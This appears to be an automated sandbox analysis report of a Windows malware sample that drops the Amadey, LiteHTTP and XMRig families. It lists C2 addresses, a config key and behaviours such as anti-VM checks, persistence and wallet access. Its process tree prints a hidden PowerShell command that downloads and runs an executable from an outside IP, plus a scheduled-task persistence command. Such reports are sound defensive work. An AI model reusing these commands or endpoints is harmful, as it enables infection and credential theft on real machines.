Analysis
-
max time kernel
130s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 17:53
Static task
static1
General
-
Target
74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe
-
Size
938KB
-
MD5
f05c426533feda04db6bff6509118219
-
SHA1
1d14d9f5090f9823f8bcf5f11815ab96fe5ac448
-
SHA256
74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d
-
SHA512
5f3d0c65ae241842ee84bedc24ef29e06961206c1c6757a1a9d7e52a826f350aca04c1e0f91780e5c084cd91a2757f0a80f064c805c152005952619444383139
-
SSDEEP
24576:/qDEvCTbMWu7rQYlBQcBiT6rprG8a0pu:/TvC/MTQYxsWR7a0p
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Signatures
-
Amadey family
-
Litehttp family
-
Xmrig family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempLVHRO92FETIHRM6MYOYIN83LFR9BMUEH.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe -
XMRig Miner payload 11 IoCs
resource yara_rule behavioral1/memory/2096-254-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2096-253-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2096-257-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2096-256-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2096-259-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2096-258-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2096-260-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2096-262-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2096-263-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/380-396-0x00000000069F0000-0x00000000070DE000-memory.dmp xmrig behavioral1/memory/380-438-0x00000000069F0000-0x0000000006E9C000-memory.dmp xmrig -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2284 powershell.exe 8 2420 powershell.exe 9 2456 powershell.exe -
pid Process 2372 powershell.exe 1780 powershell.exe 292 powershell.exe 2152 powershell.exe 2092 powershell.exe 2960 powershell.exe 2284 powershell.exe 2420 powershell.exe 2456 powershell.exe -
Creates new service(s) 2 TTPs
-
Download via BitsAdmin 1 TTPs 3 IoCs
pid Process 2568 bitsadmin.exe 1704 bitsadmin.exe 2860 bitsadmin.exe -
Downloads MZ/PE file 9 IoCs
flow pid Process 4 2284 powershell.exe 8 2420 powershell.exe 9 2456 powershell.exe 7 380 rapes.exe 10 380 rapes.exe 10 380 rapes.exe 18 380 rapes.exe 33 380 rapes.exe 33 380 rapes.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempLVHRO92FETIHRM6MYOYIN83LFR9BMUEH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempLVHRO92FETIHRM6MYOYIN83LFR9BMUEH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe -
Executes dropped EXE 19 IoCs
pid Process 2716 TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE 380 rapes.exe 2432 e2489f69e3.exe 2328 TempLVHRO92FETIHRM6MYOYIN83LFR9BMUEH.EXE 2584 ce4pMzk.exe 2732 v6Oqdnc.exe 3008 483d2fa8a0d53818306efeb32d3.exe 1780 OEHBOHk.exe 2400 MCxU5Fj.exe 2968 MCxU5Fj.exe 476 Process not Found 2424 ckonftponqgz.exe 2208 Y87Oyyz.exe 3004 Y87Oyyz.exe 2168 SplashWin.exe 1820 SplashWin.exe 2132 zY9sqWs.exe 1504 Ps7WqSx.exe 2084 FvbuInU.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine TempLVHRO92FETIHRM6MYOYIN83LFR9BMUEH.EXE Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine FvbuInU.exe -
Loads dropped DLL 52 IoCs
pid Process 2284 powershell.exe 2284 powershell.exe 2716 TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE 2716 TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE 380 rapes.exe 2420 powershell.exe 2420 powershell.exe 380 rapes.exe 380 rapes.exe 380 rapes.exe 2456 powershell.exe 2456 powershell.exe 1632 WerFault.exe 1632 WerFault.exe 1632 WerFault.exe 380 rapes.exe 380 rapes.exe 380 rapes.exe 2400 MCxU5Fj.exe 1600 WerFault.exe 1600 WerFault.exe 1600 WerFault.exe 1600 WerFault.exe 1600 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 476 Process not Found 380 rapes.exe 2208 Y87Oyyz.exe 3004 Y87Oyyz.exe 3004 Y87Oyyz.exe 2168 SplashWin.exe 2168 SplashWin.exe 2168 SplashWin.exe 2168 SplashWin.exe 1820 SplashWin.exe 1820 SplashWin.exe 1820 SplashWin.exe 380 rapes.exe 380 rapes.exe 2304 WerFault.exe 2304 WerFault.exe 2304 WerFault.exe 2412 cmd.exe 3032 Syncsign_v1.exe 380 rapes.exe 380 rapes.exe 380 rapes.exe 380 rapes.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\e2489f69e3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104610101\\e2489f69e3.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104620121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\9wvMkiFG\\Anubis.exe\"" ce4pMzk.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3000 powercfg.exe 2224 powercfg.exe 1700 powercfg.exe 1656 powercfg.exe 1856 powercfg.exe 2652 powercfg.exe 568 powercfg.exe 2572 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0005000000018718-37.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe OEHBOHk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe ckonftponqgz.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 2716 TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE 380 rapes.exe 2328 TempLVHRO92FETIHRM6MYOYIN83LFR9BMUEH.EXE 2732 v6Oqdnc.exe 3008 483d2fa8a0d53818306efeb32d3.exe 2084 FvbuInU.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2400 set thread context of 2968 2400 MCxU5Fj.exe 68 PID 2424 set thread context of 1312 2424 ckonftponqgz.exe 102 PID 2424 set thread context of 2096 2424 ckonftponqgz.exe 108 PID 1820 set thread context of 2412 1820 SplashWin.exe 114 -
resource yara_rule behavioral1/memory/2096-249-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2096-254-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2096-253-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2096-251-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2096-250-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2096-248-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2096-252-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2096-257-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2096-256-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2096-259-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2096-258-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2096-260-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2096-262-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2096-263-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2888 sc.exe 2456 sc.exe 3012 sc.exe 2756 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 1632 2732 WerFault.exe 62 1600 2400 WerFault.exe 67 2780 2968 WerFault.exe 68 2304 2132 WerFault.exe 122 -
System Location Discovery: System Language Discovery 1 TTPs 39 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fltMC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e2489f69e3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1700 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90984b97f78ddb01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2448 schtasks.exe 2632 schtasks.exe 856 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2284 powershell.exe 2284 powershell.exe 2284 powershell.exe 2716 TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE 380 rapes.exe 2420 powershell.exe 1780 powershell.exe 292 powershell.exe 2372 powershell.exe 2420 powershell.exe 2420 powershell.exe 2456 powershell.exe 2328 TempLVHRO92FETIHRM6MYOYIN83LFR9BMUEH.EXE 2584 ce4pMzk.exe 2584 ce4pMzk.exe 2584 ce4pMzk.exe 2584 ce4pMzk.exe 2732 v6Oqdnc.exe 2456 powershell.exe 2456 powershell.exe 3008 483d2fa8a0d53818306efeb32d3.exe 2960 powershell.exe 1780 OEHBOHk.exe 2152 powershell.exe 1780 OEHBOHk.exe 1780 OEHBOHk.exe 1780 OEHBOHk.exe 1780 OEHBOHk.exe 1780 OEHBOHk.exe 1780 OEHBOHk.exe 1780 OEHBOHk.exe 1780 OEHBOHk.exe 1780 OEHBOHk.exe 2424 ckonftponqgz.exe 2092 powershell.exe 2424 ckonftponqgz.exe 2424 ckonftponqgz.exe 2424 ckonftponqgz.exe 2424 ckonftponqgz.exe 2424 ckonftponqgz.exe 2424 ckonftponqgz.exe 2424 ckonftponqgz.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2168 SplashWin.exe 1820 SplashWin.exe 1820 SplashWin.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2412 cmd.exe 2412 cmd.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1820 SplashWin.exe 2412 cmd.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 2284 powershell.exe Token: SeDebugPrivilege 2420 powershell.exe Token: SeDebugPrivilege 1780 powershell.exe Token: SeDebugPrivilege 292 powershell.exe Token: SeDebugPrivilege 2372 powershell.exe Token: SeDebugPrivilege 2456 powershell.exe Token: SeDebugPrivilege 2584 ce4pMzk.exe Token: SeDebugPrivilege 2960 powershell.exe Token: SeDebugPrivilege 2152 powershell.exe Token: SeShutdownPrivilege 568 powercfg.exe Token: SeShutdownPrivilege 2572 powercfg.exe Token: SeShutdownPrivilege 2652 powercfg.exe Token: SeShutdownPrivilege 3000 powercfg.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeShutdownPrivilege 1656 powercfg.exe Token: SeShutdownPrivilege 2224 powercfg.exe Token: SeShutdownPrivilege 1856 powercfg.exe Token: SeShutdownPrivilege 1700 powercfg.exe Token: SeLockMemoryPrivilege 2096 explorer.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 2716 TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE 2432 e2489f69e3.exe 2432 e2489f69e3.exe 2432 e2489f69e3.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 2432 e2489f69e3.exe 2432 e2489f69e3.exe 2432 e2489f69e3.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2328 wrote to memory of 1412 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 31 PID 2328 wrote to memory of 1412 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 31 PID 2328 wrote to memory of 1412 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 31 PID 2328 wrote to memory of 1412 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 31 PID 2328 wrote to memory of 2248 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 32 PID 2328 wrote to memory of 2248 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 32 PID 2328 wrote to memory of 2248 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 32 PID 2328 wrote to memory of 2248 2328 74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe 32 PID 1412 wrote to memory of 2448 1412 cmd.exe 34 PID 1412 wrote to memory of 2448 1412 cmd.exe 34 PID 1412 wrote to memory of 2448 1412 cmd.exe 34 PID 1412 wrote to memory of 2448 1412 cmd.exe 34 PID 2248 wrote to memory of 2284 2248 mshta.exe 35 PID 2248 wrote to memory of 2284 2248 mshta.exe 35 PID 2248 wrote to memory of 2284 2248 mshta.exe 35 PID 2248 wrote to memory of 2284 2248 mshta.exe 35 PID 2284 wrote to memory of 2716 2284 powershell.exe 37 PID 2284 wrote to memory of 2716 2284 powershell.exe 37 PID 2284 wrote to memory of 2716 2284 powershell.exe 37 PID 2284 wrote to memory of 2716 2284 powershell.exe 37 PID 2716 wrote to memory of 380 2716 TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE 38 PID 2716 wrote to memory of 380 2716 TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE 38 PID 2716 wrote to memory of 380 2716 TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE 38 PID 2716 wrote to memory of 380 2716 TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE 38 PID 380 wrote to memory of 2432 380 rapes.exe 40 PID 380 wrote to memory of 2432 380 rapes.exe 40 PID 380 wrote to memory of 2432 380 rapes.exe 40 PID 380 wrote to memory of 2432 380 rapes.exe 40 PID 2432 wrote to memory of 2392 2432 e2489f69e3.exe 41 PID 2432 wrote to memory of 2392 2432 e2489f69e3.exe 41 PID 2432 wrote to memory of 2392 2432 e2489f69e3.exe 41 PID 2432 wrote to memory of 2392 2432 e2489f69e3.exe 41 PID 2432 wrote to memory of 1648 2432 e2489f69e3.exe 42 PID 2432 wrote to memory of 1648 2432 e2489f69e3.exe 42 PID 2432 wrote to memory of 1648 2432 e2489f69e3.exe 42 PID 2432 wrote to memory of 1648 2432 e2489f69e3.exe 42 PID 2392 wrote to memory of 2632 2392 cmd.exe 44 PID 2392 wrote to memory of 2632 2392 cmd.exe 44 PID 2392 wrote to memory of 2632 2392 cmd.exe 44 PID 2392 wrote to memory of 2632 2392 cmd.exe 44 PID 1648 wrote to memory of 2420 1648 mshta.exe 45 PID 1648 wrote to memory of 2420 1648 mshta.exe 45 PID 1648 wrote to memory of 2420 1648 mshta.exe 45 PID 1648 wrote to memory of 2420 1648 mshta.exe 45 PID 380 wrote to memory of 2200 380 rapes.exe 47 PID 380 wrote to memory of 2200 380 rapes.exe 47 PID 380 wrote to memory of 2200 380 rapes.exe 47 PID 380 wrote to memory of 2200 380 rapes.exe 47 PID 2200 wrote to memory of 1700 2200 cmd.exe 49 PID 2200 wrote to memory of 1700 2200 cmd.exe 49 PID 2200 wrote to memory of 1700 2200 cmd.exe 49 PID 2200 wrote to memory of 1700 2200 cmd.exe 49 PID 2200 wrote to memory of 1536 2200 cmd.exe 50 PID 2200 wrote to memory of 1536 2200 cmd.exe 50 PID 2200 wrote to memory of 1536 2200 cmd.exe 50 PID 2200 wrote to memory of 1536 2200 cmd.exe 50 PID 1536 wrote to memory of 1780 1536 cmd.exe 51 PID 1536 wrote to memory of 1780 1536 cmd.exe 51 PID 1536 wrote to memory of 1780 1536 cmd.exe 51 PID 1536 wrote to memory of 1780 1536 cmd.exe 51 PID 2200 wrote to memory of 1548 2200 cmd.exe 52 PID 2200 wrote to memory of 1548 2200 cmd.exe 52 PID 2200 wrote to memory of 1548 2200 cmd.exe 52 PID 2200 wrote to memory of 1548 2200 cmd.exe 52
Processes
-
C:\Users\Admin\AppData\Local\Temp\74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe"C:\Users\Admin\AppData\Local\Temp\74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn MXenbmaquu9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\8y2tvYrNH.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn MXenbmaquu9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\8y2tvYrNH.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2448
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\8y2tvYrNH.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'R1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Users\Admin\AppData\Local\TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE"C:\Users\Admin\AppData\Local\TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Users\Admin\AppData\Local\Temp\10104610101\e2489f69e3.exe"C:\Users\Admin\AppData\Local\Temp\10104610101\e2489f69e3.exe"6⤵
